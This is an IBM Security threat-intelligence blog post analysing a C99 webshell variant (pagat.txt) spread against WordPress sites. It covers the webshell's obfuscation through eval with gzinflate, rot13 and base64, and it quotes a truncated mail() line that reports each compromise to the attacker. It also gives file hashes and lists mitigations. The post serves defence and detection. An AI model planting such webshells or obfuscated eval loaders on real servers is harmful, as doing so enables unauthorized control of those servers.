April 14, 2016 By Dave McMillen 5 min read

IBM Security is always looking for high-volume anomalies that might signify a new attack trend. One example is webshells, which are scripts (such as PHP, ASPX, etc.) that perform as a control panel graphical user interface (GUI). An attacker could utilize a webshell to gain system-level access to a vulnerable server.

Over the past two months, IBM Managed Security Services (MSS) has noticed a steep increase in attackers’ attempts to push a variant of the popular C99 webshell.

Although we see many attempts to push malicious PHP code on a daily basis, the increased volume of this particular webshell is startling compared to other types of webshell activity IBM MSS tracks: a 45 percent increase from February through March.

According to VirusTotal, relatively few antivirus vendors are catching this variant. What’s more, it’s targeting vulnerable WordPress systems, becoming yet another threat to content management systems (CMS).

Webshells in a Nutshell

Webshells can be used legitimately by a system administrator to perform actions on the server, such as creating a user, reading system logs and restarting a service. Unlike a reverse shell, which requires a secondary program such as Netcat to be run on a victim’s machine, webshells require no communications socket and are simply run over HTTP. They are basically backdoors that run from the browser.

Webshells are considered post-exploitation tools. Before the webshell can be used in an attack, a vulnerability must be found on a target Web application. One way to accomplish this is by first uploading the webshell through a file upload page (e.g., a submission form on a company website) and then using a Local File Include (LFI) weakness in the application to include the webshell in one of the pages.

The Request

Let’s begin with what we are seeing: There is one common URL and file name, pagat.txt, that contains an obfuscated PHP script. Attackers will purposely hide their malicious code in an effort to evade detection and assist in bypassing a Web application firewall (WAF) that may be protecting the website.

The following GET request is issued for this particular variant: hxxp://www.victim.com/wp-content/themes/twentythirteen/pagat.txt. The abbreviation “wp” in the request stands for WordPress.

The text file pagat.txt contains the obfuscated code below, which has been purposely truncated in this example for security reasons.

This obfuscated PHP code would be passed to the eval() function only after it is deobfuscated using one of these three methods:

  • Gzinflate inflates a deflated string. This function takes data compressed by gzdeflate() and returns the original uncompressed data.
  • Rot13 is a simple letter-substitution cipher that replaces a character with whatever comes 13 letters after it in the alphabet.
  • Base64 features binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into radix-64.

Any of these three obfuscation methods can be used to decipher obfuscated code by simply using an online PHP decoding tool.

The Mechanism

The PHP module on the victim server will decode the obfuscated strings and execute the script. Once decoded, the script shows its intent. The examples below are purposely truncated for security reasons.

First, an email is sent to [email protected] (actual email obfuscated) confirming the target has been compromised:

mail(“[email protected]“, “$body”, “Hasil Bajakan hxxp://$web$inj

Next, the script creates a form page on the victim’s website:

Next, the attacker will call the new form from the browser. This will enable the attacker to execute shell commands on the server as well as push additional files that can be used for other nefarious actions.

WordPress Content Management Systems at Risk

What is very clear is that this particular variant of the C99 webshell is focusing on WordPress CMS vulnerabilities. Our data showed a distinct upward trend in alert volume tied specifically to this C99 variant. IBM MSS detected almost 1,000 attacks utilizing this specific webshell code beginning in February 2016.

Most of the time, these webshell entry points result from vulnerabilities in third-party plugins (which we know often don’t undergo any security review during development) or an unpatched bug in the parent application. In fact, according to IBM X-Force, the largest percentage of CMS vulnerabilities are found in plugins or modules written by third parties.

This specific variant is one of many being used by a mass Web defacer known as Hmei7, who reportedly defaced more than 5,000 WordPress websites over a two-day period. Hmei7 uses backdoors with a file uploading feature and changes critical site files like index.php or configuration.php, which are essentially the keys to controlling the kingdom. Hmei7 is known to have defaced more than 154,000 websites and is currently being tracked by Zone-H.

Read the research report: Understanding the risks of content management systems

Identification

As of April 12, 2016, a Google search for the file name pagat.txt returned more than 32,000 results. Only nine of 68 antivirus products identify this malicious php script, according to VirusTotal. Below is more information about the script:

  • MD5: 6b58157d69de0fc2663a0765e1d9c5b5
  • SHA1: 0a027b75243f8e6230991c8e58520c7e7799c5cf
  • SHA256: c0134d499451bff03335523c9f435f5bce408401d0a042881838d4f309cf8844
  • ssdeep24: FMojOrnQLqFlTuOnAtau89M+2XUSMrL1//5ZOcKVrNVkQYfEVhS2/KDZPep30VLg:KGOr6Y0OAgu8SiLtrKTVI6hS2/3p30Vc
  • File size: 1.5 KB (1515 bytes)
  • File type: PHP

Refer to the associated X-Force Exchange collection for more information.

Mitigation

We brought this issue forward to draw attention to one of the easiest methods for attackers to achieve unauthorized access to your network. Prevention goes a long way to limiting the risk exposure. The following recommendations can help mitigate the latest variant of the C99 webshell:

  • Edit your php.ini file to disallow base64_decode functionality. Find the line that states disable_functions = and change it to disable_functions = eval, base64_decode, gzinflate.
  • Change the name of your uploads folder. WordPress allows write access to this folder through the media uploader, which makes it easier for attackers to upload PHP files that contain shell scripts. If you leave this folder as the default, an attacker with limited knowledge can guess the file path.
  • Install a good security plugin such as the Wordfence WordPress plugin.
  • Change all WordPress defaults to customize your install as much as possible.
  • If your website becomes compromised, anything that requires validation — such as SSL, FTP, SQL, router/firewall CLI, etc. — is also compromised, including your customers’ credentials. You must change all your passwords and advise your customers to do so the same.
  • Scan all files during attachment uploading with ModSecurity. Attackers can take advantage of your excluded content to hide their code. It is no longer feasible to exclude certain file types such as .jpg and .gif since they have been known to contain malicious PHP code within the image headers.
  • Use a CMS security scanner such as Acunetix Vulnerability Scanner or WordPress Security Scanner to test for vulnerabilities in a WordPress installation.

Additional recommendations can be found in the IBM X-Force research report “Understanding the Risks of Content Management Systems.”

More from Threat Intelligence

Phishing kit trends and the top 10 spoofed brands of 2023

4 min read -  The 2024 IBM X-Force Threat Intelligence Index reported that phishing was one of the top initial access vectors observed last year, accounting for 30% of incidents. To carry out their phishing campaigns, attackers often use phishing kits: a collection of tools, resources and scripts that are designed and assembled to ease deployment. Each phishing kit deployment corresponds to a single phishing attack, and a kit could be redeployed many times during a phishing campaign. IBM X-Force has analyzed thousands of…

Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns

16 min read - Since March 2024, IBM X-Force has been tracking several large-scale phishing campaigns distributing the Grandoreiro banking trojan, which is likely operated as a Malware-as-a-Service (MaaS). Analysis of the malware revealed major updates within the string decryption and domain generating algorithm (DGA), as well as the ability to use Microsoft Outlook clients on infected hosts to spread further phishing emails. The latest malware variant also specifically targets over 1500 global banks, enabling attackers to perform banking fraud in over 60 countries…

Threat intelligence to protect vulnerable communities

2 min read - Key members of civil society—including journalists, political activists and human rights advocates—have long been in the cyber crosshairs of well-resourced nation-state threat actors but have scarce resources to protect themselves from cyber threats. On May 14, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released a High-Risk Communities Protection (HRCP) report developed through the Joint Cyber Defense Collaborative that addresses the threat to these vulnerable groups, with findings contributed by the X-Force Threat Intelligence team.Cyber criminals seek stolen credentialsThe HRCP…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today